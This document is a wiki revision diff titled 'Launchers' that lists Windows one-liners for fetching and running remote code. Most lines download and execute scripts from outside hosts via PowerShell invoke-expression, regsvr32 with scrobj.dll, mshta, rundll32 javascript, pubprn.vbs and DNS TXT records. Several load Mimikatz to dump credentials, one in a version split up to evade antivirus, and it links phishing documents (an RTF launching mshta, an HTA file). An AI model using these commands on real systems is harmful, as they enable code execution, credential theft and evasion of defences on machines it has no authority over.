Launchers: Difference between revisions

From WikiWiki
Jump to navigation Jump to search
No edit summary   (change visibility)
(11 intermediate revisions by the same user not shown)
Line 8: Line 8:


<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas
</syntaxhighlight>


#starts calc
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll


<syntaxhighlight lang="powershell">
#starts powershell that runs mimikatz
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll
#start calc - https://twitter.com/vysecurity/status/857734235695796225
powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt calc.mendelonline.be ))[5]"
#run calc via vbs
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:https://mendelonline.be/security/poc/runcalc.sct
</syntaxhighlight>
</syntaxhighlight>
https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1
* https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1
* more subtee: https://github.com/subTee/windows-operating-system-archaeology/blob/master/Evasion/pubprn_injection.txt
 
 
* powershell encodedcommand: https://mendelonline.be/tools/powershell-encodecommand.php


=phishing docs=
* Credits.rtf - https://mendelonline.be/security/poc/Credits.rtf - run mshta from rtf
* "Show information.hta" - https://mendelonline.be/security/poc/Show%20information.hta - run code from hta file




=more=
=more=
* subtee's gist's: https://gist.github.com/subTee
* subtee's gist's: https://gist.github.com/subTee

Revision as of 15:14, 8 May 2017

Some fun oneliners to start a script

mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");

https://twitter.com/ch33kyf3ll0w/status/816319597645328384 https://gist.github.com/subTee/62fc28bb5dc58dbe9efdd56d65921bd2

#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz

#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas

#starts calc
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll

#starts powershell that runs mimikatz
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll

#start calc - https://twitter.com/vysecurity/status/857734235695796225
powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt calc.mendelonline.be ))[5]"


#run calc via vbs
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:https://mendelonline.be/security/poc/runcalc.sct


phishing docs


more